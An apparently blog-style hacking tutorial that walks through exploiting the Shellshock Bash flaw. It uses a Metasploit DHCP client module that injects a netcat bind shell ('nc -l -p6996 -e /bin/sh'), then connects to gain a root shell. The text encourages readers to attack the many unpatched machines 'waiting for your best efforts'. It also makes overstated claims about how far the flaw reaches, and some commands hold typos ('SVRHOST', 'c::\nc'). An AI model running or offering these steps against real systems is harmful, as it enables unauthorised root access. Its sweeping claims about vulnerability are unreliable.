Hack Like a Pro: How to Hack the Shellshock Vulnerability
Welcome back, my hacker novitiates!
Every so often, a MAJOR vulnerability appears that makes millions of systems vulnerable to attack. The most recent, named Shellshock, basically leaves every Mac OS X, Linux, and UNIX system on the planet vulnerable. As nearly two-thirds of all web servers on planet Earth run one of these operating systems (primarily Linux), that's a whole lot of systems out there waiting to be harvested.
This vulnerability is one of the most serious in recent memory. Basically, it leaves nearly every form of Linux, Unix, and Mac OS X vulnerable to "remote code execution." This mean that the hacker can run their own code remotely and do whatever they want on the system, basically owning it.
Shellshock will be with us for quite a while, despite efforts to patch systems, as we are only beginning to understand the extent of this vulnerability. Every time a new patch is released, it almost immediately becomes obsolete as new vulnerabilities are being discovered daily. The first proof of concept involved running a CGI script on the vulnerable system, but that is only scratching the surface of what can be done with this vulnerability.
Many network and security admins are now sitting around pretty smug that they have patched their system and they are now safe. That is far from the truth! This vulnerability is linked to the BASH shell and any system calls it makes. That list is extremely long! Probably thousands of utilities and applications use BASH for system calls. Furthermore, nearly all the embedded systems, from security systems to automobiles to automated lighting systems use some form of Linux with a BASH shell. ALL are vulnerable to this hack.
Of course, the whole industry of IT security administrators are now scrambling to close this hole. Years of experience have taught me that many won't and many more will think they closed it and haven't (there is a fair amount of incompetence among IT security folks, as in other professions). In the meantime, millions are millions of machines are out there, just waiting for your best efforts.
Recently, our friends at Rapid7, the developers of Metasploit, released a quick and dirty module that exploits one of the first discovered Shellshock vulnerabilities, namely the exploitation of the BASH shell to send CGI scripts to an Apache server. In addition, they also developed a module that enables us to exploit Shellshock using the DHCP service. Let's use that one to attack a Linux system and see how it works.
Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following one.
Since this is a new Meatsploit module, it is not in your Metasploit Framework when you downloaded Kali, so we need to update Metasploit. Let's open a terminal and type:
kali > msfupdate
This might take awhile, so be patient.
Now that we updated our Metasploit and presumably downloaded the new Shellshock modules, let's find this new exploit. In the Metasploit framework, type:
msf > search shellshock
As we can see, Metasploit found the auxiliary module for attacking the DHCP client using the Shellshock vulnerability.
Let's now load that module by typing:
msf > use auxiliary/server/dhclient/dhclient_bash_env
Now, let's type info to get more information on this module.
msf > info
We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.
Now, let's show options.
msf > show options
First, let's set the DHCP server IP. This is the SRVHOST parameter.
msf > set SVRHOST 192.168.131.254
Next, let's set the code that we want to inject through the BASH shell. Although, this module comes with a netcat command by default, let's change it slightly with a command that I have found gives us better and more reliable results.
msf > set CMD /bin/nc -l -p6996 -e /bin/sh
Lastly, let's set the NETMASK.
msf > set NETMASK 255.255.255.0
Finally, let's simply type "exploit" to run the module.
msf > exploit
When we do so, we simply get the message "Auxiliary module execution completed." In our case here, this simply means that we were able to run our CMD line using the Shellshock vulnerability to set up a netcat listener with root privileges on port 6996 piping out a BASH shell to whoever chooses to connect to it!
Now that we have injected netcat into the vulnerable system, we should be able to connect to that machine remotely with administrative/root privileges. We would then own that machine!
For demonstration purposes, let's connect to that system with a Windows machine remotely by connecting to the netcat listener. First, open a command prompt on the Windows system and type:
c::\nc 192.168.131.129 6996
When we do so, it will return a blank line. When we type "ifconfig":
It returns the network settings of the exploited Linux system. Now, to confirm our privilege level, let's type "whoami":
In this screenshot, you can see that we have not only been able to access the system remotely, but we have root privileges. We OWN this system!
The Shellshock vulnerability makes nearly every system that runs a version of UNIX, Linux, or Mac OS X vulnerable to exploitation. Since the vulnerability is related to the BASH shell and its system calls, the number of vulnerabilities and exploits will become nearly innumerable.
This hack utilizes the BASH system call to the DHCP client, but this is just one of many potential exploits. Apple and the major Linux distributions have all issued patches, but there are still innumerable ways to get past these patches. I expect them to be issuing new patches almost weekly as we find more and more exploits taking advantage of the Shellshock vulnerability.
I will keep you up to date on each of these new hacks, so keep coming back, my hacker novitiates!